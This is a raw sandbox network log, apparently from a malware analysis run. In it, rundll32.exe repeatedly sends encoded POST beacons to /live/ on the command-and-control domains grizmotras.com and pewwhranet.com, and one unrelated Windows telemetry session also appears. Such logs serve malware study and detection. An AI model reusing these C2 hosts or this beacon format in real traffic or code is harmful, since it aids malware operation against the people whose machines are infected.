                                                                                                2024-04-26 21:19:38 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                52192.168.2.549775172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:39 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:39 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 44 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RpDMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:42 UTC570INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:42 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MrsCbsGpuKdSelD9zef7FKxfaadTTHJ1tm2VpfqBRuRRrT0f6HL4q6dFYqe2E5o8rKp6Z48FHkFQmGbH0kRAAgUJdRFTHEfLogKFbs6V2sgTYxnt9GwsUHwa9voQ9TvAIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99cbf2b2f02e4-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:42 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                53192.168.2.549776172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:43 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:43 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoBcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:47 UTC578INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:47 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=olHAgBuw%2BnGRDgqUV5%2Fa72bEvLONX6yR2g3KfjDOnvgRI2BTgFx6MZgBZGycfDhlwyU02jEXPM1Lq%2FCPmYAozyAi%2BsYwTMvcZVechoXBgUsSttlXySAAxSfiYg4285AUow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99cd8ea0b7489-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:47 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                54192.168.2.549777172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:47 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:47 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoBMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:54 UTC570INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:54 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oG9BGwJWVZtohXag8JUjal2EPhdhIPXwC3VCGX989QqpuzcVp9JSPxAXatgGZs7LLgx92lOEpF6dxoi2zrwHn1HStIoEWZ1LzEOq5Emcz4ZOAKEKnh6ith2POaRzmKu6hQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99cf61cefa65d-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:54 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                55192.168.2.549778172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:54 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:54 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoB8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:59 UTC576INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2FcUGqNdJU0pXP8TXEuTuO%2F6uZ4f8sUqTVNz3QYhslkkMvOmaJ9t5uev6li1bHYNkr53NFFxc%2Bmy4H8EAkMdopVz8fzceYguqV56mHoWAW2JWAQ60QkD8H3T8IJcTM8ilQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99d202ca80318-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:59 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                56192.168.2.54977920.42.73.28443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:58 UTC828OUTPOST /OneCollector/1.0/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521
                                                                                                AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=
                                                                                                Client-Id: NO_AUTH
                                                                                                Content-Encoding: deflate
                                                                                                Content-Type: application/bond-compact-binary
                                                                                                Expect: 100-continue
                                                                                                SDK-Version: EVT-Windows-C++-No-3.4.15.1
                                                                                                Upload-Time: 1714166397033
                                                                                                Host: self.events.data.microsoft.com
                                                                                                Content-Length: 7972
                                                                                                Connection: Keep-Alive
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:58 UTC7972OUTData Raw: ed 7c 5b ac 5c d7 79 de 50 52 58 8a a2 28 5a 92 65 49 56 2c 46 90 5d 2b 9e 39 5d f7 cb a0 41 4c f1 50 16 5d d1 54 78 28 c9 0e 10 b0 7b 66 f6 99 d9 e4 cc ec a3 b9 f0 22 e4 41 30 8a 00 29 e0 a2 34 50 a0 e8 93 d1 87 c0 02 d2 a2 40 9b 87 04 08 90 87 02 ad c3 bc 14 7d 4c 0b b4 05 fa d2 a7 a0 68 fb d2 3e f4 fb d7 be ad 59 3a a2 1d c3 10 62 80 07 24 0f ff b5 d6 5e d7 ff ff fe ef 5f 6b ed fd c6 e3 72 8f 5d 56 57 0f 0f 8b 71 7e e3 e0 de 7a 93 2f ea 5f 6f e7 d9 7c 33 bb 92 6f b2 49 b6 c9 f6 f3 db 28 71 b1 5c ae cb 79 81 84 7c f2 e1 1f fe e4 87 0f fe f4 07 ff fa 3f 7d e1 93 d7 ca e1 78 e2 a4 31 c2 18 ce c7 6a 9c 65 99 3b 1c eb 91 c8 ad 70 79 ee f8 e4 3f 9c fc fe 13 0f be 78 fa 44 71 e6 fd 2b 77 b2 55 de 3f 7f 79 39 de fb fd d3 95 24 58 9f f7 1e bc 70 fa 44 ef c1 97
                                                                                                Data Ascii: |[\yPRX(ZeIV,F]+9]ALP]Tx({f"A0)4P@}Lh>Y:b$^_kr]VWq~z/_o|3oI(q\y|?}x1je;py?xDq+wU?y9$XpD
                                                                                                2024-04-26 21:19:58 UTC25INHTTP/1.1 100 Continue
                                                                                                2024-04-26 21:19:58 UTC443INHTTP/1.1 200 OK
                                                                                                Content-Length: 9
                                                                                                Content-Type: application/json
                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                time-delta-millis: 1183
                                                                                                Access-Control-Allow-Headers: time-delta-millis
                                                                                                Access-Control-Allow-Methods: POST
                                                                                                Access-Control-Allow-Credentials: true
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                Date: Fri, 26 Apr 2024 21:19:57 GMT
                                                                                                Connection: close
                                                                                                {"acc":4}


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                57192.168.2.549780172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:00 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:00 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoBsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                58192.168.2.549781104.21.84.207443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:08 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:08 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoBsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                59192.168.2.549782172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:12 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:12 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoBsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:20:16 UTC580INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:20:16 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYDkiWclmWEzl6gPS%2BZ6ccSKz3ciKT%2BhnwUGc1%2BwmZ%2FafkGJ7gYt77lLjwY4yJMZKe0p6cpnqxpNN%2BObaLjM2h0vsqZnF3hutuq64VWa2QxLTfG2L0xtxMfCxXN0io2fbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99d8fa88ca575-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:20:16 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:20:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                60192.168.2.549783172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:16 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:16 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                61192.168.2.549784104.21.84.207443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:21 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
